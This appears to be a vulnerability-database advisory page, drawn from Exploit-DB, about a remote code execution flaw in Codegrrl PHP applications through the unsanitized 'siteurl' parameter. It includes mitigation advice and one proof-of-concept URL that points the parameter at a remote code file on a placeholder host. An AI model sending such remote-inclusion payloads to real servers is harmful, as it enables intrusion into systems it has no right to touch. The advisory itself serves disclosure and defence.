header-logo
Suggest Exploit
vendor:
Unspecified Codegrrl applications
by:
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: Unspecified Codegrrl applications
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Unspecified Codegrrl applications remote arbitrary code execution vulnerability

The vulnerability is caused by a lack of proper sanitization of user-supplied input. An attacker can exploit this by supplying malicious code as input in the 'siteurl' parameter, which is not properly sanitized. This allows the attacker to execute arbitrary code in the context of the Web server process, potentially leading to a compromise of the system.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization mechanisms. Additionally, it is advised to restrict access to the affected application and regularly update to the latest version that addresses this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15417/info

Unspecified Codegrrl applications are prone to a remote arbitrary code execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this to execute arbitrary code in the context of the Web server process. This may facilitate a compromise of the system; other attacks are also possible. 

http://www.example.com/protection.php?action=logout&siteurl=http://www.example.com/malicoius-code.txt

Navigation

Suggest Exploit

Services By CQR